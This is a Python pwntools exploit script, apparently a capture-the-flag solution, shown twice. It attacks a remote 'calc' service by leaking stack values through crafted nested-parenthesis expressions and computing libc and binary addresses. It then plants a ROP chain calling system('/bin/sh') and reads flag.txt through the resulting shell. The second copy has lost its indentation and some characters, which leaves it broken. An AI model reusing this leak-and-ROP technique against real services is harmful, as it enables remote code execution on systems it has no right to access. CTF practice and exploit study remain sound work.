Lorak-mmk/exploit.py Secret

## exploit.py
#!/usr/bin/env python
from pwn import *
import struct

#r = remote('127.0.0.1', 1337)
r = remote('h4x.0x04.net', 2137)
#r = process(['./calc'], env={'LD_LIBRARY_PATH': '.'})
context.terminal = ['termite', '-e']

def int_to_double(val):
    return struct.unpack('d', struct.pack('Q', val))[0]

def readstack(n, read=True):
    reps = 31 + n
    cvar = chr(ord('a') + n)
    payload = f'{cvar}={"(" * reps}+{")" * (n+7)}'
    if n > 0:
        beg = n
        payload += f'+0*{"(" * beg}0+{")+".join([chr(ord("a") + i) for i in range(n)][::-1])}{")" * (beg - n + 1)}'

    payload += ')' * (reps - (n+7))
    if len(payload) > 1023:
        print('PAYLOAD TOO BIG')
    print('payload:', payload)
    r.sendline(payload)
    if(read):
        r.sendline(cvar)
        val_str = r.recvline().strip().decode()
        val =  float(val_str)
        packed = struct.pack('d', val)
        assert(len(packed) == 8)
        return struct.unpack('Q', packed)[0], val_str


#gdb.attach(r, gdbscript=open('gdbscript.py'))

stack = []

for i in range(0, 8):
    val, val_str = readstack(i)
    print(f'stack[{i}] = {hex(val)} (str={val_str})')
    stack.append(val)

libc_start_main = stack[7] - 242
libc_addr = libc_start_main - 0x28060
libc_system = libc_addr + 0x4a830
libc_bin_sh = libc_addr + 0x18de78

main_addr = stack[3] - 125
exec_addr = main_addr - 0x1b5e

pop_rdi = exec_addr + 0x1c73


payload = f'd={int_to_double(pop_rdi)}'
print(payload)
r.sendline(payload)

payload = f'e={int_to_double(libc_bin_sh)}'
print(payload)
r.sendline(payload)

payload = f'f={int_to_double(libc_system)}'
print(payload)
r.sendline(payload)

readstack(6, read=False)
r.sendline('cat flag.txt')
print(r.readline().decode().strip())
	#!/usr/bin/env python
	from pwn import *
	import struct

	#r = remote('127.0.0.1', 1337)
	r = remote('h4x.0x04.net', 2137)
	#r = process(['./calc'], env={'LD_LIBRARY_PATH': '.'})
	context.terminal = ['termite', '-e']

	def int_to_double(val):
	return struct.unpack('d', struct.pack('Q', val))[0]

	def readstack(n, read=True):
	reps = 31 + n
	cvar = chr(ord('a') + n)
	payload = f'{cvar}={"(" * reps}+{")" * (n+7)}'
	if n > 0:
	beg = n
	payload += f'+0{"(" beg}0+{")+".join([chr(ord("a") + i) for i in range(n)][::-1])}{")" * (beg - n + 1)}'

	payload += ')' * (reps - (n+7))
	if len(payload) > 1023:
	print('PAYLOAD TOO BIG')
	print('payload:', payload)
	r.sendline(payload)
	if(read):
	r.sendline(cvar)
	val_str = r.recvline().strip().decode()
	val = float(val_str)
	packed = struct.pack('d', val)
	assert(len(packed) == 8)
	return struct.unpack('Q', packed)[0], val_str


	#gdb.attach(r, gdbscript=open('gdbscript.py'))

	stack = []

	for i in range(0, 8):
	val, val_str = readstack(i)
	print(f'stack[{i}] = {hex(val)} (str={val_str})')
	stack.append(val)

	libc_start_main = stack[7] - 242
	libc_addr = libc_start_main - 0x28060
	libc_system = libc_addr + 0x4a830
	libc_bin_sh = libc_addr + 0x18de78

	main_addr = stack[3] - 125
	exec_addr = main_addr - 0x1b5e

	pop_rdi = exec_addr + 0x1c73


	payload = f'd={int_to_double(pop_rdi)}'
	print(payload)
	r.sendline(payload)

	payload = f'e={int_to_double(libc_bin_sh)}'
	print(payload)
	r.sendline(payload)

	payload = f'f={int_to_double(libc_system)}'
	print(payload)
	r.sendline(payload)

	readstack(6, read=False)
	r.sendline('cat flag.txt')
	print(r.readline().decode().strip())